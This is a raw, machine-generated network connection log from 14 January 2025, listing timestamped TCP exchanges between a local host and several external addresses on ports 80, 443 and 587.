Jan 14, 2025 08:08:47.545758009 CET	52779	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:47.546210051 CET	52779	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:47.552850962 CET	52781	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:47.557809114 CET	80	52781	132.226.8.169	192.168.2.4
Jan 14, 2025 08:08:47.557878017 CET	52781	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:47.558037996 CET	52781	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:47.562946081 CET	80	52781	132.226.8.169	192.168.2.4
Jan 14, 2025 08:08:47.775279999 CET	443	52780	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:47.776830912 CET	52780	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:47.776891947 CET	443	52780	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:47.818505049 CET	587	52774	46.151.208.21	192.168.2.4
Jan 14, 2025 08:08:47.818531036 CET	587	52774	46.151.208.21	192.168.2.4
Jan 14, 2025 08:08:47.818619967 CET	52774	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:08:47.922094107 CET	443	52780	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:47.922251940 CET	443	52780	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:47.922478914 CET	52780	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:47.922806978 CET	52780	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:47.948107958 CET	52778	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:47.948868036 CET	52782	443	192.168.2.4	149.154.167.220
Jan 14, 2025 08:08:47.948909044 CET	443	52782	149.154.167.220	192.168.2.4
Jan 14, 2025 08:08:47.948985100 CET	52782	443	192.168.2.4	149.154.167.220
Jan 14, 2025 08:08:47.949340105 CET	52782	443	192.168.2.4	149.154.167.220
Jan 14, 2025 08:08:47.949348927 CET	443	52782	149.154.167.220	192.168.2.4
Jan 14, 2025 08:08:47.950483084 CET	587	52774	46.151.208.21	192.168.2.4
Jan 14, 2025 08:08:47.953310013 CET	80	52778	132.226.8.169	192.168.2.4
Jan 14, 2025 08:08:47.953370094 CET	52778	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:47.965118885 CET	52774	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:08:47.969937086 CET	587	52774	46.151.208.21	192.168.2.4
Jan 14, 2025 08:08:48.238749027 CET	587	52774	46.151.208.21	192.168.2.4
Jan 14, 2025 08:08:48.244647980 CET	52774	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:08:48.249527931 CET	587	52774	46.151.208.21	192.168.2.4
Jan 14, 2025 08:08:48.395697117 CET	80	52781	132.226.8.169	192.168.2.4
Jan 14, 2025 08:08:48.396953106 CET	52783	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:48.397048950 CET	443	52783	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:48.397146940 CET	52783	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:48.397370100 CET	52783	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:48.397387028 CET	443	52783	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:48.443212986 CET	52781	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:48.535522938 CET	587	52774	46.151.208.21	192.168.2.4
Jan 14, 2025 08:08:48.541455984 CET	52774	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:08:48.546287060 CET	587	52774	46.151.208.21	192.168.2.4
Jan 14, 2025 08:08:48.595180988 CET	443	52782	149.154.167.220	192.168.2.4
Jan 14, 2025 08:08:48.595263004 CET	52782	443	192.168.2.4	149.154.167.220
Jan 14, 2025 08:08:48.596761942 CET	52782	443	192.168.2.4	149.154.167.220
Jan 14, 2025 08:08:48.596771002 CET	443	52782	149.154.167.220	192.168.2.4
Jan 14, 2025 08:08:48.597264051 CET	443	52782	149.154.167.220	192.168.2.4
Jan 14, 2025 08:08:48.608493090 CET	52782	443	192.168.2.4	149.154.167.220
Jan 14, 2025 08:08:48.655327082 CET	443	52782	149.154.167.220	192.168.2.4
Jan 14, 2025 08:08:48.815871000 CET	587	52774	46.151.208.21	192.168.2.4
Jan 14, 2025 08:08:48.816207886 CET	52774	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:08:48.821043015 CET	587	52774	46.151.208.21	192.168.2.4
Jan 14, 2025 08:08:48.847069025 CET	443	52782	149.154.167.220	192.168.2.4
Jan 14, 2025 08:08:48.847251892 CET	443	52782	149.154.167.220	192.168.2.4
Jan 14, 2025 08:08:48.847330093 CET	52782	443	192.168.2.4	149.154.167.220
Jan 14, 2025 08:08:48.851912975 CET	52782	443	192.168.2.4	149.154.167.220
Jan 14, 2025 08:08:48.876540899 CET	443	52783	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:48.886077881 CET	52783	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:48.886157036 CET	443	52783	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:49.001523972 CET	443	52783	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:49.001683950 CET	443	52783	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:49.001766920 CET	52783	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:49.002042055 CET	52783	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:49.005331993 CET	52781	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:49.006479979 CET	52784	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:49.010380030 CET	80	52781	132.226.8.169	192.168.2.4
Jan 14, 2025 08:08:49.010441065 CET	52781	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:49.011432886 CET	80	52784	132.226.8.169	192.168.2.4
Jan 14, 2025 08:08:49.011507034 CET	52784	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:49.011588097 CET	52784	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:49.016395092 CET	80	52784	132.226.8.169	192.168.2.4
Jan 14, 2025 08:08:49.093894005 CET	587	52774	46.151.208.21	192.168.2.4
Jan 14, 2025 08:08:49.094158888 CET	52774	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:08:49.099033117 CET	587	52774	46.151.208.21	192.168.2.4
Jan 14, 2025 08:08:49.367831945 CET	587	52774	46.151.208.21	192.168.2.4
Jan 14, 2025 08:08:49.368175030 CET	52774	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:08:49.373008013 CET	587	52774	46.151.208.21	192.168.2.4
Jan 14, 2025 08:08:49.641175985 CET	587	52774	46.151.208.21	192.168.2.4
Jan 14, 2025 08:08:49.641376019 CET	52774	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:08:49.646248102 CET	587	52774	46.151.208.21	192.168.2.4
Jan 14, 2025 08:08:49.845804930 CET	80	52784	132.226.8.169	192.168.2.4
Jan 14, 2025 08:08:49.847182035 CET	52785	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:49.847279072 CET	443	52785	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:49.847371101 CET	52785	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:49.847630978 CET	52785	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:49.847656965 CET	443	52785	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:49.896395922 CET	52784	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:49.913990974 CET	587	52774	46.151.208.21	192.168.2.4
Jan 14, 2025 08:08:49.917112112 CET	52774	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:08:49.917171001 CET	52774	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:08:49.917195082 CET	52774	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:08:49.917213917 CET	52774	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:08:49.922076941 CET	587	52774	46.151.208.21	192.168.2.4
Jan 14, 2025 08:08:49.922107935 CET	587	52774	46.151.208.21	192.168.2.4
Jan 14, 2025 08:08:49.922210932 CET	587	52774	46.151.208.21	192.168.2.4
Jan 14, 2025 08:08:49.922238111 CET	587	52774	46.151.208.21	192.168.2.4
Jan 14, 2025 08:08:50.307105064 CET	443	52785	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:50.308614016 CET	52785	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:50.308655977 CET	443	52785	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:50.376749992 CET	587	52774	46.151.208.21	192.168.2.4
Jan 14, 2025 08:08:50.427563906 CET	52774	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:08:50.435740948 CET	443	52785	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:50.435939074 CET	443	52785	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:50.436000109 CET	52785	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:50.436216116 CET	52785	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:50.439213037 CET	52784	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:50.440161943 CET	52786	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:50.444350004 CET	80	52784	132.226.8.169	192.168.2.4
Jan 14, 2025 08:08:50.445091009 CET	80	52786	132.226.8.169	192.168.2.4
Jan 14, 2025 08:08:50.445291042 CET	52784	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:50.445291996 CET	52786	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:50.446115017 CET	52786	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:50.450998068 CET	80	52786	132.226.8.169	192.168.2.4
Jan 14, 2025 08:08:51.267903090 CET	80	52786	132.226.8.169	192.168.2.4
Jan 14, 2025 08:08:51.269388914 CET	52787	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:51.269489050 CET	443	52787	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:51.269587040 CET	52787	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:51.269838095 CET	52787	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:51.269860983 CET	443	52787	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:51.318334103 CET	52786	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:51.734441042 CET	443	52787	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:51.735995054 CET	52787	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:51.736037970 CET	443	52787	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:51.856914043 CET	443	52787	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:51.857103109 CET	443	52787	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:51.857184887 CET	52787	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:51.857734919 CET	52787	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:51.861304998 CET	52786	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:51.862535000 CET	52788	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:51.866436958 CET	80	52786	132.226.8.169	192.168.2.4
Jan 14, 2025 08:08:51.866651058 CET	52786	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:51.867420912 CET	80	52788	132.226.8.169	192.168.2.4
Jan 14, 2025 08:08:51.867495060 CET	52788	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:51.867625952 CET	52788	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:51.872446060 CET	80	52788	132.226.8.169	192.168.2.4
Jan 14, 2025 08:08:51.895443916 CET	52774	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:08:51.900336981 CET	587	52774	46.151.208.21	192.168.2.4
Jan 14, 2025 08:08:52.169291019 CET	587	52774	46.151.208.21	192.168.2.4
Jan 14, 2025 08:08:52.169754982 CET	52774	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:08:52.170608044 CET	52789	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:08:52.176026106 CET	587	52789	46.151.208.21	192.168.2.4
Jan 14, 2025 08:08:52.176111937 CET	52789	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:08:52.689090014 CET	80	52788	132.226.8.169	192.168.2.4
Jan 14, 2025 08:08:52.690546036 CET	52790	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:52.690649033 CET	443	52790	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:52.690748930 CET	52790	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:52.691004038 CET	52790	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:52.691028118 CET	443	52790	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:52.740147114 CET	52788	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:53.155113935 CET	443	52790	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:53.156609058 CET	52790	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:53.156697989 CET	443	52790	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:53.289473057 CET	443	52790	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:53.289649010 CET	443	52790	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:53.289756060 CET	52790	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:53.290054083 CET	52790	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:53.293916941 CET	52788	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:53.294456005 CET	52791	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:53.299015045 CET	80	52788	132.226.8.169	192.168.2.4
Jan 14, 2025 08:08:53.299062014 CET	52788	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:53.299387932 CET	80	52791	132.226.8.169	192.168.2.4
Jan 14, 2025 08:08:53.299457073 CET	52791	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:53.299577951 CET	52791	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:53.304419041 CET	80	52791	132.226.8.169	192.168.2.4
Jan 14, 2025 08:08:53.802042007 CET	587	52789	46.151.208.21	192.168.2.4
Jan 14, 2025 08:08:53.802196026 CET	52789	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:08:53.807147026 CET	587	52789	46.151.208.21	192.168.2.4
Jan 14, 2025 08:08:54.092839956 CET	587	52789	46.151.208.21	192.168.2.4
Jan 14, 2025 08:08:54.093002081 CET	52789	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:08:54.097856998 CET	587	52789	46.151.208.21	192.168.2.4
Jan 14, 2025 08:08:54.134176970 CET	80	52791	132.226.8.169	192.168.2.4
Jan 14, 2025 08:08:54.135454893 CET	52792	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:54.135562897 CET	443	52792	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:54.135643959 CET	52792	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:54.135885954 CET	52792	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:54.135909081 CET	443	52792	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:54.177699089 CET	52791	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:54.366542101 CET	587	52789	46.151.208.21	192.168.2.4
Jan 14, 2025 08:08:54.366827965 CET	52789	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:08:54.371675014 CET	587	52789	46.151.208.21	192.168.2.4
Jan 14, 2025 08:08:54.606863022 CET	443	52792	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:54.608747005 CET	52792	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:54.608833075 CET	443	52792	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:54.674614906 CET	587	52789	46.151.208.21	192.168.2.4
Jan 14, 2025 08:08:54.674660921 CET	587	52789	46.151.208.21	192.168.2.4
Jan 14, 2025 08:08:54.674747944 CET	52789	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:08:54.676347017 CET	52789	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:08:54.681147099 CET	587	52789	46.151.208.21	192.168.2.4
Jan 14, 2025 08:08:54.748158932 CET	443	52792	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:54.748322010 CET	443	52792	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:54.748457909 CET	52792	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:54.748680115 CET	52792	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:54.751425028 CET	52791	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:54.752573967 CET	52793	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:54.756557941 CET	80	52791	132.226.8.169	192.168.2.4
Jan 14, 2025 08:08:54.756623030 CET	52791	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:54.757373095 CET	80	52793	132.226.8.169	192.168.2.4
Jan 14, 2025 08:08:54.757440090 CET	52793	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:54.757535934 CET	52793	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:54.762361050 CET	80	52793	132.226.8.169	192.168.2.4
Jan 14, 2025 08:08:54.952425003 CET	587	52789	46.151.208.21	192.168.2.4
Jan 14, 2025 08:08:54.953264952 CET	52789	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:08:54.958117962 CET	587	52789	46.151.208.21	192.168.2.4
Jan 14, 2025 08:08:55.141241074 CET	52794	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:08:55.146189928 CET	587	52794	46.151.208.21	192.168.2.4
Jan 14, 2025 08:08:55.146717072 CET	52794	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:08:55.243937016 CET	587	52789	46.151.208.21	192.168.2.4
Jan 14, 2025 08:08:55.244385004 CET	52789	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:08:55.249526024 CET	587	52789	46.151.208.21	192.168.2.4
Jan 14, 2025 08:08:55.516817093 CET	587	52789	46.151.208.21	192.168.2.4
Jan 14, 2025 08:08:55.517915964 CET	52789	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:08:55.523231983 CET	587	52789	46.151.208.21	192.168.2.4
Jan 14, 2025 08:08:55.595376968 CET	80	52793	132.226.8.169	192.168.2.4
Jan 14, 2025 08:08:55.601336002 CET	52795	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:55.601388931 CET	443	52795	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:55.601447105 CET	52795	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:55.601943970 CET	52795	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:55.601963043 CET	443	52795	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:55.646337986 CET	52793	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:55.796916962 CET	587	52789	46.151.208.21	192.168.2.4
Jan 14, 2025 08:08:55.797168970 CET	52789	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:08:55.802225113 CET	587	52789	46.151.208.21	192.168.2.4
Jan 14, 2025 08:08:56.062211990 CET	443	52795	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:56.063806057 CET	52795	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:56.063858986 CET	443	52795	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:56.069787025 CET	587	52789	46.151.208.21	192.168.2.4
Jan 14, 2025 08:08:56.070090055 CET	52789	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:08:56.074918985 CET	587	52789	46.151.208.21	192.168.2.4
Jan 14, 2025 08:08:56.076009989 CET	587	52794	46.151.208.21	192.168.2.4
Jan 14, 2025 08:08:56.076334000 CET	52794	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:08:56.081202030 CET	587	52794	46.151.208.21	192.168.2.4
Jan 14, 2025 08:08:56.206089973 CET	443	52795	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:56.206231117 CET	443	52795	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:56.206849098 CET	52795	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:56.206970930 CET	52795	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:56.241621971 CET	52793	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:56.242491961 CET	52796	443	192.168.2.4	149.154.167.220
Jan 14, 2025 08:08:56.242584944 CET	443	52796	149.154.167.220	192.168.2.4
Jan 14, 2025 08:08:56.242691040 CET	52796	443	192.168.2.4	149.154.167.220
Jan 14, 2025 08:08:56.243067026 CET	52796	443	192.168.2.4	149.154.167.220
Jan 14, 2025 08:08:56.243102074 CET	443	52796	149.154.167.220	192.168.2.4
Jan 14, 2025 08:08:56.246697903 CET	80	52793	132.226.8.169	192.168.2.4
Jan 14, 2025 08:08:56.246757984 CET	52793	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:56.375001907 CET	587	52794	46.151.208.21	192.168.2.4
Jan 14, 2025 08:08:56.375411034 CET	587	52789	46.151.208.21	192.168.2.4
Jan 14, 2025 08:08:56.375519991 CET	52794	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:08:56.375658989 CET	52789	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:08:56.380417109 CET	587	52794	46.151.208.21	192.168.2.4
Jan 14, 2025 08:08:56.380486965 CET	587	52789	46.151.208.21	192.168.2.4
Jan 14, 2025 08:08:56.646831036 CET	587	52789	46.151.208.21	192.168.2.4
Jan 14, 2025 08:08:56.648066044 CET	587	52794	46.151.208.21	192.168.2.4
Jan 14, 2025 08:08:56.648334026 CET	52789	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:08:56.648389101 CET	52794	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:08:56.648394108 CET	52789	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:08:56.648554087 CET	52789	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:08:56.648554087 CET	52789	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:08:56.648621082 CET	52789	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:08:56.653188944 CET	587	52789	46.151.208.21	192.168.2.4
Jan 14, 2025 08:08:56.653383017 CET	587	52794	46.151.208.21	192.168.2.4
Jan 14, 2025 08:08:56.653394938 CET	587	52789	46.151.208.21	192.168.2.4
Jan 14, 2025 08:08:56.653407097 CET	587	52789	46.151.208.21	192.168.2.4
Jan 14, 2025 08:08:56.653497934 CET	587	52789	46.151.208.21	192.168.2.4
Jan 14, 2025 08:08:56.653508902 CET	587	52789	46.151.208.21	192.168.2.4
Jan 14, 2025 08:08:56.653578997 CET	587	52789	46.151.208.21	192.168.2.4
Jan 14, 2025 08:08:56.653590918 CET	587	52789	46.151.208.21	192.168.2.4
Jan 14, 2025 08:08:56.653642893 CET	587	52789	46.151.208.21	192.168.2.4
Jan 14, 2025 08:08:56.653655052 CET	587	52789	46.151.208.21	192.168.2.4
Jan 14, 2025 08:08:56.653692007 CET	587	52789	46.151.208.21	192.168.2.4
Jan 14, 2025 08:08:56.914798021 CET	443	52796	149.154.167.220	192.168.2.4
Jan 14, 2025 08:08:56.915064096 CET	52796	443	192.168.2.4	149.154.167.220
Jan 14, 2025 08:08:56.916379929 CET	52796	443	192.168.2.4	149.154.167.220
Jan 14, 2025 08:08:56.916409016 CET	443	52796	149.154.167.220	192.168.2.4
Jan 14, 2025 08:08:56.916944027 CET	443	52796	149.154.167.220	192.168.2.4
Jan 14, 2025 08:08:56.918293953 CET	52796	443	192.168.2.4	149.154.167.220
Jan 14, 2025 08:08:56.963334084 CET	443	52796	149.154.167.220	192.168.2.4
Jan 14, 2025 08:08:56.970212936 CET	587	52794	46.151.208.21	192.168.2.4
Jan 14, 2025 08:08:56.970278978 CET	587	52794	46.151.208.21	192.168.2.4
Jan 14, 2025 08:08:56.970720053 CET	52794	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:08:56.971836090 CET	52794	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:08:56.976594925 CET	587	52794	46.151.208.21	192.168.2.4
Jan 14, 2025 08:08:57.105381012 CET	587	52789	46.151.208.21	192.168.2.4
Jan 14, 2025 08:08:57.146377087 CET	52789	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:08:57.208379030 CET	443	52796	149.154.167.220	192.168.2.4
Jan 14, 2025 08:08:57.208539009 CET	443	52796	149.154.167.220	192.168.2.4
Jan 14, 2025 08:08:57.208710909 CET	52796	443	192.168.2.4	149.154.167.220
Jan 14, 2025 08:08:57.210903883 CET	52796	443	192.168.2.4	149.154.167.220
Jan 14, 2025 08:08:57.243046045 CET	587	52794	46.151.208.21	192.168.2.4
Jan 14, 2025 08:08:57.246212959 CET	52794	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:08:57.251044989 CET	587	52794	46.151.208.21	192.168.2.4
Jan 14, 2025 08:08:57.535113096 CET	587	52794	46.151.208.21	192.168.2.4
Jan 14, 2025 08:08:57.535423040 CET	52794	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:08:57.540374994 CET	587	52794	46.151.208.21	192.168.2.4
Jan 14, 2025 08:08:57.804460049 CET	587	52794	46.151.208.21	192.168.2.4
Jan 14, 2025 08:08:57.804800034 CET	52794	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:08:57.809658051 CET	587	52794	46.151.208.21	192.168.2.4
Jan 14, 2025 08:08:58.080132008 CET	587	52794	46.151.208.21	192.168.2.4
Jan 14, 2025 08:08:58.080380917 CET	52794	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:08:58.085300922 CET	587	52794	46.151.208.21	192.168.2.4
Jan 14, 2025 08:08:58.350265026 CET	587	52794	46.151.208.21	192.168.2.4
Jan 14, 2025 08:08:58.350534916 CET	52794	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:08:58.355401993 CET	587	52794	46.151.208.21	192.168.2.4
Jan 14, 2025 08:08:58.620207071 CET	587	52794	46.151.208.21	192.168.2.4
Jan 14, 2025 08:08:58.620800972 CET	52794	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:08:58.625608921 CET	587	52794	46.151.208.21	192.168.2.4
Jan 14, 2025 08:08:58.889446974 CET	587	52794	46.151.208.21	192.168.2.4
Jan 14, 2025 08:08:58.890117884 CET	52794	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:08:58.890119076 CET	52794	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:08:58.890119076 CET	52794	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:08:58.890542984 CET	52794	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:08:58.895006895 CET	587	52794	46.151.208.21	192.168.2.4
Jan 14, 2025 08:08:58.895021915 CET	587	52794	46.151.208.21	192.168.2.4
Jan 14, 2025 08:08:58.895296097 CET	587	52794	46.151.208.21	192.168.2.4
Jan 14, 2025 08:08:58.895332098 CET	587	52794	46.151.208.21	192.168.2.4
Jan 14, 2025 08:08:59.342308044 CET	587	52794	46.151.208.21	192.168.2.4
Jan 14, 2025 08:08:59.399319887 CET	52794	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:09:00.872505903 CET	52794	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:09:00.877542019 CET	587	52794	46.151.208.21	192.168.2.4
Jan 14, 2025 08:09:01.141957045 CET	587	52794	46.151.208.21	192.168.2.4
Jan 14, 2025 08:09:01.146328926 CET	52794	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:09:01.147109985 CET	52814	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:09:01.152065039 CET	587	52814	46.151.208.21	192.168.2.4
Jan 14, 2025 08:09:01.152673960 CET	52814	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:09:02.700980902 CET	587	52814	46.151.208.21	192.168.2.4
Jan 14, 2025 08:09:02.701210022 CET	52814	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:09:02.706244946 CET	587	52814	46.151.208.21	192.168.2.4
Jan 14, 2025 08:09:02.995007992 CET	587	52814	46.151.208.21	192.168.2.4
Jan 14, 2025 08:09:02.995279074 CET	52814	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:09:03.000210047 CET	587	52814	46.151.208.21	192.168.2.4
Jan 14, 2025 08:09:03.272272110 CET	587	52814	46.151.208.21	192.168.2.4
Jan 14, 2025 08:09:03.272836924 CET	52814	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:09:03.277766943 CET	587	52814	46.151.208.21	192.168.2.4
Jan 14, 2025 08:09:03.419142008 CET	52777	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:09:03.588330030 CET	587	52814	46.151.208.21	192.168.2.4
Jan 14, 2025 08:09:03.588395119 CET	587	52814	46.151.208.21	192.168.2.4
Jan 14, 2025 08:09:03.588613987 CET	52814	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:09:03.590033054 CET	52814	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:09:03.594901085 CET	587	52814	46.151.208.21	192.168.2.4
Jan 14, 2025 08:09:03.647211075 CET	52830	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:09:03.652076006 CET	587	52830	46.151.208.21	192.168.2.4
Jan 14, 2025 08:09:03.652241945 CET	52830	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:09:03.863740921 CET	587	52814	46.151.208.21	192.168.2.4
